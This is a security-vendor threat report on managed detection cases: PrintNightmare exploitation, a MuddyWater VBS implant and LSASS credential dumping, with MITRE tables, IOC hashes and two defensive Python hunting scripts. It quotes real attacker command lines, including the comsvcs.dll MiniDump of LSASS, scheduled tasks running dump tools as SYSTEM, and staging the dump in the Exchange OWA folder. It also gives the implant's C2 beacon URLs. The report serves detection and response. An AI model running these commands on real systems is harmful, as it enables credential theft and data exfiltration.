Kaspersky Managed Detection and Response: interesting cases


![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15092025/abstract-security-alert-sl-990x400.jpg)

_Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a highly professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts, complementing the automatic detection logic and letting us continuously improve the detection rules._

_The MDR results allow us to map out the modern threat landscape and show the techniques attackers are using right now. We share these results with you so that you are better informed about in-the-wild attacks and better prepared to respond._

## PrintNightmare vulnerability exploitation

This summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). The vulnerability was published in June 2021 (CVE-2021-1675 was first classified as a local privilege escalation; CVE-2021-34527 was assigned once the remote code execution impact became clear). It lets an authenticated attacker hand the spooler service an arbitrary "printer driver" DLL, which the spooler loads as SYSTEM; because the driver installation is reachable over RPC, the code runs remotely on any vulnerable host the attacker can authenticate to. We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability; today we will talk about how MDR analysts detected and investigated attacks that exploit it in real companies.

### Case #1

Shortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was taken down several hours later, but during this time several other users managed to clone it.
Kaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed the spooler service accessing suspicious DLL files. Notably, the file names used by the attacker were exactly the same as those in the public exploit on GitHub.

| Observation | Artifacts |
|---|---|
| Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | `C:\Windows\System32\spool\drivers\x64\3\nightmare.dll`<br>`C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll` |
| In addition, the following script was found on the host. | `\cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1` |

The table below contains the signs of suspicious activity that served as the starting point for the investigation.
| MITRE ATT&CK technique | MDR telemetry event type used | Detection details | Description |
|---|---|---|---|
| **T1210:** Exploitation of Remote Services | Local File Modification | Modified file path: `C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll`<br>File modifier: `C:\Windows\System32\spoolsv.exe`<br>Parent of the modifier: `C:\Windows\System32\services.exe` | Legitimate spoolsv.exe locally modified `c:\windows\system32\spool\drivers\x64\3\old\1\nightmare.dll` |
| **T1588.005:** Obtain Capabilities: Exploits | AV exact detect in OnAccess mode | File: `\cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1`<br>AV verdicts: Exploit.Win64.CVE-2021-1675.c; UDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit was detected and successfully deleted by the AM engine |

### Case #2

In another case, MDR analysts discovered a different attack scenario involving exploitation of the PrintNightmare vulnerability. Again the spooler service accessed suspicious DLL files; in addition, the spooler service executed unusual commands and established a network connection. Based on the tools used, we presume this activity was related to penetration testing.

| Observation | Artifacts |
|---|---|
| MDR analysts detected the creation of suspicious DLL libraries with the _certutil.exe_ tool on a monitored host. After that, a scheduled task that starts the spooler service was created (exploitation tends to leave the spooler stopped or crashed, so the attacker keeps restarting it). | `C:\Windows\System32\spool\drivers\x64\3\new\hello.dll`<br>`C:\Windows\System32\spool\drivers\x64\3\new\unidrv.dll`… |
| Next, the spooler service loaded the newly created DLL files. In addition, the attacker ran some of the created libraries using the rundll32 component. | |
| Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication, which makes any intercepted [NTLM](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) challenge-response far easier to crack or relay. | `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\MSV1_0` |
| Then the attacker re-created the scheduled task for the spooler, after which execution of various commands with System privileges was observed. The source of this activity was the _c:\windows\system32\spoolsv.exe_ process. | `C:\Windows\System32\cmd.exe /c net start spooler`<br>`C:\Windows\System32\cmd.exe /c timeout 600 > NUL && net start spooler` |

The signs of suspicious activity that served as the starting point for the investigation are summarized in the MITRE ATT&CK table that follows.
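The telemetry in both PrintNightmare cases reduces to three observable behaviours of one process: spoolsv.exe writing a DLL into its driver store, spoolsv.exe (directly or through cmd.exe) spawning a shell or recon tool as SYSTEM, and spoolsv.exe opening a network connection to a port that has nothing to do with printing. The following script is an added example, not Kaspersky MDR's detection logic, showing those three hunts as rules over constructed telemetry records modelled on the fields quoted in the tables (the field names, the sample events and the IP addresses are assumptions). The important caveat is built in: a DLL drop by spoolsv.exe is exactly what a legitimate point-and-print install looks like, so on its own it only rates triage; it escalates only when corroborated by execution or C2 from the spooler.

```python
"""Hunting rules for the post-exploitation traces quoted in the two PrintNightmare cases.

Added example, not Kaspersky MDR's detection logic. The telemetry records below are
constructed dicts modelled on the fields quoted in the tables (modified file path,
modifier process, parent/grandparent, remote port); the field names are assumptions.
"""
import ntpath

# Where the spooler unpacks x64 driver packages; spoolsv.exe writes here during
# legitimate point-and-print installs too, so a DLL drop alone is only a triage signal.
SPOOL_DRIVER_DIR = "c:\\windows\\system32\\spool\\drivers\\x64\\3\\"
# Children a healthy spooler never launches. PrintIsolationHost.exe is a normal
# child (driver isolation) and is deliberately absent from this set.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe", "rundll32.exe",
                       "net.exe", "net1.exe", "timeout.exe", "certutil.exe"}
# Ports the spooler legitimately talks to: RPC endpoint mapper, SMB print shares,
# IPP and raw printing. Anything else from spoolsv.exe is worth a look.
EXPECTED_PRINT_PORTS = {135, 445, 631, 9100}


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _image(path: str) -> str:
    return ntpath.basename(_norm(path))


def rule_driver_dll_dropped(ev):
    """T1210 (low): spoolsv.exe wrote a DLL into the x64 driver store."""
    if ev["type"] != "file_modified" or _image(ev["modifier"]) != "spoolsv.exe":
        return None
    path = _norm(ev["path"])
    if path.startswith(SPOOL_DRIVER_DIR) and path.endswith(".dll"):
        return ("low", "T1210", f"spoolsv.exe wrote {ev['path']}")
    return None


def rule_spoolsv_child(ev):
    """T1547.012 / T1059.003 (high): spoolsv.exe, directly or via cmd.exe, started a shell or recon tool."""
    if ev["type"] != "process_start":
        return None
    lineage = {_image(ev.get("parent", "")), _image(ev.get("grandparent", ""))}
    if "spoolsv.exe" in lineage and _image(ev["image"]) in SUSPICIOUS_CHILDREN:
        return ("high", "T1547.012",
                f"spoolsv.exe lineage started '{ev['cmdline']}' at integrity {ev['integrity']}")
    return None


def rule_spoolsv_network(ev):
    """(high) spoolsv.exe opened an outbound TCP connection to a non-printing port."""
    if ev["type"] != "net_connect" or _image(ev["image"]) != "spoolsv.exe":
        return None
    port = ev["remote_port"]
    if port in EXPECTED_PRINT_PORTS:
        return None
    note = " (default Meterpreter listener port)" if port == 4444 else ""
    return ("high", "T1210", f"spoolsv.exe connected to {ev['remote_ip']}:{port}{note}")


RULES = (rule_driver_dll_dropped, rule_spoolsv_child, rule_spoolsv_network)


def hunt(events):
    """Run every rule over every event; returns (severity, technique, message) tuples."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


def verdict(findings):
    """A driver drop on its own is triage; code execution or C2 from the spooler escalates."""
    severities = {f[0] for f in findings}
    if "high" in severities:
        return "escalate"
    return "triage" if "low" in severities else "clean"


# Constructed telemetry for one host, following the shape of the events quoted above.
SAMPLE_EVENTS = [
    {"type": "file_modified", "path": r"C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll",
     "modifier": r"C:\Windows\System32\spoolsv.exe", "parent": r"C:\Windows\System32\services.exe"},
    {"type": "process_start", "image": r"C:\Windows\System32\PrintIsolationHost.exe",  # benign child
     "cmdline": "PrintIsolationHost.exe", "parent": r"C:\Windows\System32\spoolsv.exe",
     "grandparent": r"C:\Windows\System32\services.exe", "integrity": "System"},
    {"type": "process_start", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami",
     "parent": r"C:\WINDOWS\System32\spoolsv.exe", "grandparent": r"C:\Windows\System32\services.exe",
     "integrity": "System"},
    {"type": "net_connect", "image": r"C:\Windows\System32\spoolsv.exe",  # benign raw-port print job
     "remote_ip": "10.0.0.5", "remote_port": 9100},
    {"type": "net_connect", "image": r"C:\Windows\System32\spoolsv.exe",
     "remote_ip": "192.0.2.10", "remote_port": 4444},
    {"type": "process_start", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami",
     "parent": r"C:\Windows\System32\cmd.exe", "grandparent": r"C:\Windows\System32\spoolsv.exe",
     "integrity": "System"},
    {"type": "process_start", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /c net start spooler",
     "parent": r"C:\Windows\System32\spoolsv.exe", "grandparent": r"C:\Windows\System32\services.exe",
     "integrity": "System"},
]

if __name__ == "__main__":
    for sev, tech, msg in hunt(SAMPLE_EVENTS):
        print(f"[{sev:4}] {tech:10} {msg}")
    print("verdict:", verdict(hunt(SAMPLE_EVENTS)))
```

Run against the constructed host the rules produce one low finding (the driver-store drop) and four high ones (two whoami launches, the cmd.exe launch and the 4444/TCP connection), so the host escalates; the benign PrintIsolationHost.exe child and the port-9100 print job are ignored. Feeding only the driver-store event yields "triage", which is the right answer for a DLL drop with no corroboration.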
| MITRE ATT&CK technique | MDR telemetry event type used | Detection details | Description |
|---|---|---|---|
| **T1570:** Lateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloaded a suspicious DLL (a Meterpreter payload) via HTTP |
| **T1140:** Deobfuscate/Decode Files or Information | Local File Modification | Process command line: `certutil -decode 1.txt C:\Share\hello4.dll` | Attacker used _certutil_ to decode a text file into a PE binary |
| **T1003.001:** OS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: VHO:Trojan-PSW.Win64.Mimikatz.gen; Trojan-PSW.Win32.Mimikatz.gen | Attacker tried to use Mimikatz |
| **T1127.001:** Trusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Share\1.xml` | MSBuild network activity |
| **T1210:** Exploitation of Remote Services | Local File Modification | Modified file path: `C:\Windows\System32\spool\drivers\x64\3\old\1\hello5.dll`<br>File modifier: `C:\Windows\System32\spoolsv.exe`<br>Parent of the modifier: `C:\Windows\System32\services.exe` | Legitimate spoolsv.exe locally modified `c:\windows\system32\spool\drivers\x64\3\old\1\hello5.dll` |
| **T1547.012:** Boot or Logon Autostart Execution: Print Processors<br>**T1033:** System Owner/User Discovery | Process start | Command line: `whoami`<br>Process integrity level: System<br>Parent process: `C:\WINDOWS\System32\spoolsv.exe`<br>Grandparent process: `C:\Windows\System32\services.exe` | Legitimate spoolsv.exe started whoami with System integrity level |
| **T1547.012:** Boot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: `C:\Windows\System32\spoolsv.exe`<br>Remote TCP port: 4444/TCP | Legitimate spoolsv.exe connected to the default Meterpreter port (4444/TCP) |
| **T1547.012:** Boot or Logon Autostart Execution: Print Processors<br>**T1059.003:** Command and Scripting Interpreter: Windows Command Shell<br>**T1033:** System Owner/User Discovery | Process start | Command line: `whoami`<br>Process integrity level: System<br>Parent process: `C:\Windows\System32\cmd.exe`<br>Grandparent process: `C:\Windows\System32\spoolsv.exe` | Legitimate spoolsv.exe started cmd.exe, which started whoami with System integrity level |

## MuddyWater attack

In this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious host associated with an APT group. Further investigation allowed us to attribute the attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017 and mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>).

Among other methods, the group uses VBS implants delivered in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is shown below.

[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05-1024x283.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>)

| Observation | Artifacts |
|---|---|
| First of all, MDR analysts found a VBS implant, presumably related to the MuddyWater group, running from the Startup folder on the monitored host. | `\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs` |
| After the script executed, malicious resources were accessed. The structure of these URLs follows the common pattern used by the MuddyWater group, and the IP address contacted has been observed in other attacks by this group. Note that the beacon is plain HTTP sent to port 443, which no ordinary client does. | `hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1`<br>`hxxp://185[.]117[.]73[.]52:443/getCommand?guid=xxx-yyy-zzz` * |
| Next, execution of commands to collect information from the compromised host was observed. | `"C:\Windows\System32\cmd.exe" /c explorer.exe >> c:\ProgramData\app_setting_readme.txt`<br>`"C:\Windows\System32\cmd.exe" /c whoami >> c:\ProgramData\app_setting_readme.txt` |

**_* xxx is the company short name (identifier), yyy is the victim hostname and zzz is the username_**

The signs of suspicious activity that served as the starting point for the investigation are summarized in the MITRE ATT&CK table that follows.
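The beacon URLs above carry enough structure to be matched without a fixed IP: a known endpoint name, a `guid` parameter in the `<company>-<host>-<user>` layout, and cleartext HTTP aimed at port 443. The script below is an added example (not Kaspersky MDR's rule) that parses a requested URL for that shape, pulls the victim identity out of the guid, and grades each request by how much execution context corroborates it: a script host rather than a browser, a script running from the per-user Startup folder, and the scheme/port mismatch. The events are constructed; the guid values are invented placeholders in the `xxx-yyy-zzz` format, and the benign requests are there to show what must not fire.

```python
"""Triage of non-browser HTTP requests for the MuddyWater beacon shape described above.

Added example, not Kaspersky MDR's rule. Events are constructed dicts with the three
fields quoted in the table (process image, command line, requested URL); the guid
values are invented placeholders in the xxx-yyy-zzz format, not real victims.
"""
import ntpath
from urllib.parse import parse_qs, urlparse

C2_ENDPOINTS = {"/gettargetinfo", "/getcommand"}   # paths seen in the beacons above
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def refang(url: str) -> str:
    """Turn the defanged hxxp://1[.]2[.]3[.]4 notation back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def parse_beacon(url: str):
    """Return the victim identity if the URL has the <endpoint>?guid=<company>-<host>-<user> shape, else None."""
    u = urlparse(refang(url))
    if u.path.lower() not in C2_ENDPOINTS:
        return None
    guid = parse_qs(u.query).get("guid", [""])[0]
    parts = guid.split("-")
    # Hostnames may themselves contain hyphens, so take the first part as the company
    # identifier, the last as the user name, and everything in between as the host.
    if len(parts) < 3 or not all(parts):
        return None
    return {"endpoint": u.path.lstrip("/"), "company": parts[0],
            "host": "-".join(parts[1:-1]), "user": parts[-1]}


def cleartext_on_tls_port(url: str) -> bool:
    """The beacons above speak plain HTTP to port 443, which no legitimate client does."""
    u = urlparse(refang(url))
    return u.scheme == "http" and u.port == 443


def triage(ev):
    beacon = parse_beacon(ev["url"])
    if beacon is None:
        return None
    indicators = [f"C2 endpoint {beacon['endpoint']} with guid=<company>-<host>-<user>"]
    image = ntpath.basename(ev["image"]).lower()
    if image in SCRIPT_HOSTS:
        indicators.append(f"request made by script host {image}, not a browser")
    if STARTUP_DIR in ev["cmdline"].lower():
        indicators.append("script runs from the per-user Startup folder (T1547.001)")
    if cleartext_on_tls_port(ev["url"]):
        indicators.append("cleartext HTTP on port 443")
    # The URL shape alone is medium; corroborating execution context makes it high.
    return {"severity": "high" if len(indicators) >= 3 else "medium",
            "beacon": beacon, "indicators": indicators}


def triage_all(events):
    return [r for r in map(triage, events) if r]


# Constructed events: two beacons from the implant, then two benign requests that must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs',
     "url": "hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=acme-WS-0421-jdoe&status=1"},
    {"image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs',
     "url": "hxxp://185[.]117[.]73[.]52:443/getCommand?guid=acme-WS-0421-jdoe"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe",
     "url": "https://intranet.example.com/getCommand?guid=7f3a"},
    {"image": r"C:\Windows\system32\wscript.exe", "cmdline": r"wscript.exe C:\Scripts\inventory.vbs",
     "url": "http://inventory.example.com/ping"},
]

if __name__ == "__main__":
    for r in triage_all(SAMPLE_EVENTS):
        print(r["severity"], r["beacon"], *r["indicators"], sep="\n  ")
```

Both implant beacons come out as high with all four indicators and the victim fields `company=acme`, `host=WS-0421`, `user=jdoe` extracted for the incident record; the intranet request that happens to use a `/getCommand` path is dropped because its guid does not have the three-part layout, and the inventory script is dropped because its path is not a known endpoint.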
| MITRE ATT&CK technique | MDR telemetry event type used | Detection details | Description |
|---|---|---|---|
| **T1071:** Application Layer Protocol | Access to malicious hosts from non-browsers | Target URL: `hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1`<br>CMD line: `"C:\Windows\System32\WScript.exe" C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs`<br>Process: `C:\Windows\system32\wscript.exe` | VBS script accessed a malicious URL during execution |
| **T1071:** Application Layer Protocol | URL exact detect | Malicious URL: `hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1`<br>AV verdict: Malware | Malicious URL was successfully detected by AV |

## Credential Dumping from LSASS Memory

In the last case, we'd like to talk about an attack involving the collection of credentials from a memory dump of the LSASS process (MITRE technique T1003.001). The Local Security Authority Subsystem Service (LSASS) keeps a variety of credentials in its process memory. A SYSTEM or administrative user can harvest them and use them for further attack development or lateral movement.

MDR analysts detected an attempt to dump the LSASS process memory on a monitored host, even though most of the attacker's actions did not differ from an administrator's routine activity. The attackers used two public tools (the first was detected and blocked by the AV solution) to dump the LSASS process memory, and exported the resulting dump via an Exchange server. In particular, the MDR team observed LSASS.exe loading and executing a suspicious DLL file, categorized as a Security Support Provider (SSP).
| Observation | Artifacts |
|---|---|
| The attacker executed several recon commands to learn more about the host, then ran commands to find the LSASS process ID. | `C:\Windows\System32\tasklist.exe`<br>`C:\Windows\System32\findstr.exe /i sass` |
| After that, the attacker tried to dump the process memory with a living-off-the-land technique (the MiniDump export of the built-in comsvcs.dll, called through rundll32), but it was blocked by the endpoint protection solution. | `"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 c:\programdata\cdera.bin full`<br>_## 616 is the LSASS process ID_ |
| Then the attacker tried to dump the LSASS process memory using another tool. They unpacked a password-protected archive containing the _resource.exe_ and _twindump.dll_ files. | `C:\Windows\System32\cmd.exe /C c:\"program files"\7-zip\7z.exe x -pKJERKL6j4dk&@1 c:\programdata\m.zip -o c:\windows\cluster`<br>_## resource.exe and twindump.dll files were created_ |
| Subsequently, _resource.exe_ was registered as a scheduled task running as SYSTEM and executed. However, this attempt to obtain an LSASS dump was unsuccessful. | `C:\Windows\System32\cmd.exe /C C:\Windows\System32\staskes.exe /create /tn Ecoh /tr "cmd /c C:\Windows\cluster\resource.exe ase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru system /F`<br>_## staskes.exe is a renamed copy of schtasks.exe_ |
| Later, one more attempt was made. The attacker unpacked an archive containing another malicious utility and ran it the same way as before. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool, which loads a DLL into LSASS as a Security Support Provider so that the dump can be taken without the attacker's own process opening a handle to LSASS. This time the attacker successfully obtained an LSASS dump. | `C:\Windows\System32\cmd.exe /C c:\"program files"\7-zip\7z.exe x -p"KJERfK#L6j4dk321" c:\programdata\E.zip -o c:\programdata\`<br>`C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /create /tn Ecoh /tr "c:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp" /sc onstart /ru system /F`<br>`C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /run /tn Ecoh` |
| The obtained dump was then copied, renamed to look like an image, into the web-served `owa\auth` directory of the Exchange server (the `V14` path is Exchange 2010), from where it could be downloaded over HTTPS like any other OWA asset. Afterwards, the attacker deleted all the created files. | `C:\Windows\System32\cmd.exe /C copy c:\programdata\Es.zip c:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\owa\auth\Es.png` |

The signs of suspicious activity that served as the starting point for the investigation are summarized in the MITRE ATT&CK table that follows.
| MITRE ATT&CK technique | MDR telemetry event type used | Detection details | Description |
|---|---|---|---|
| **T1003.001:** OS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: PDM:Exploit.Win32.Generic<br>Process command line: `"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 C:\programdata\cdera.bin full`<br>Parent process command line: `C:\Windows\System32\wsmprovhost.exe -Embedding`<br>Grandparent process command line: `C:\Windows\System32\svchost.exe -k DcomLaunch`<br>Process logon type: 3 (Network logon) | Remotely executed process memory dump was detected by the AM engine; the wsmprovhost.exe parent and the network logon show that the command arrived over a WinRM (PowerShell remoting) session. **616** is the LSASS PID |
| **T1003.001:** OS Credential Dumping: LSASS Memory | Create section (load DLL)<br>Execute section (run DLL) | DLL name: `C:\programdata\english1.dll`<br>Process: `C:\Windows\System32\lsass.exe`<br>Process PID: **616**<br>Parent process command line: `C:\Windows\System32\wininit.exe`<br>Process integrity level: System | Unknown DLL was loaded and executed within lsass.exe |
| **T1003.001:** OS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: the file is a Security Support Provider (SSP)<br>File path: `C:\programdata\english1.dll`<br>Process: `C:\Windows\System32\lsass.exe` | The unknown DLL loaded into lsass is an SSP |
| **T1053.005:** Scheduled Task/Job: Scheduled Task | Create process | Process command line: `C:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp`<br>Parent process command line: `taskeng.exe {7725474B-D9EA-473D-B10D-AC0572A0AA70} S-1-5-18:NT AUTHORITY\System:Service:`<br>Grandparent process command line: `C:\Windows\System32\svchost.exe -k netsvcs`<br>Process integrity level: System<br>Process user SID: S-1-5-18 | Suspicious executable from C:\programdata run as a scheduled task under _System_ privileges |

Observed malicious files:

| File | MD5 |
|---|---|
| c:\programdata\e.zip | 0x37630451944A1DD027F5A9B643790B10 |
| c:\programdata\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 |
| c:\programdata\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 |
| c:\programdata\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D |
| c:\programdata\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 |
| c:\windows\cluster\resource.exe | 0x872A776C523FC33888C410081A650070 |
| c:\windows\cluster\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE |

## Conclusion

Attackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products before security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators. Countering targeted attacks requires extensive experience as well as constant learning.

Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits of having your own security operations center without having to actually set one up.